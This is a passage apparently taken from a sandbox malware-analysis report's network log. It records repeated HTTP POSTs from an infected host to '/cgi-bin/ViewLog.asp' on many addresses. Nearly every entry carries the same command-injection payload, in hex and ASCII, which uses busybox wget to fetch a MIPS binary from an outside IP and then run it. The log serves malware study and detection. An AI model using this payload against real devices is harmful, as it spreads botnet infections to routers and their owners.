                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              404192.168.2.134009031.136.123.1188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:14.942118883 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:15.526355982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:16.678325891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:19.142323017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:23.750307083 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:32.970282078 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.654252052 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              405192.168.2.134561695.214.147.1898080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:14.943279982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              406192.168.2.134981462.56.134.1678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:14.989761114 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:15.718323946 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:17.158329964 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              407192.168.2.135760031.136.107.238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:17.511343002 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:20.678363085 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:26.822344065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:38.854295969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.942256927 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              408192.168.2.135207694.122.204.2538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:17.545063019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              409192.168.2.134012462.29.96.208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:17.545124054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              410192.168.2.134052485.95.120.1918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:17.955235958 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:18.136202097 CET405INHTTP/1.0 302 Found
                                              Cache-Control: no-cache, no-store, must-revalidate
                                              Pragma: no-cache
                                              Location: https://192.168.0.14:801/cgi-bin/ViewLog.asp
                                              Content-type: text/html
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 33 30 32 20 44 6f 63 75 6d 65 6e 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 31 39 32 2e 31 36 38 2e 30 2e 31 34 3a 38 30 31 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 3c 50 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html> <head> <title>302 Document moved</title> </head><body>This document has moved <A HREF="https://192.168.0.14:801/cgi-bin/ViewLog.asp">here</A>.<P></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              411192.168.2.134749031.136.44.688080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:17.957998991 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:18.534365892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:19.654433012 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:21.958440065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:26.566303968 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:35.526316881 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
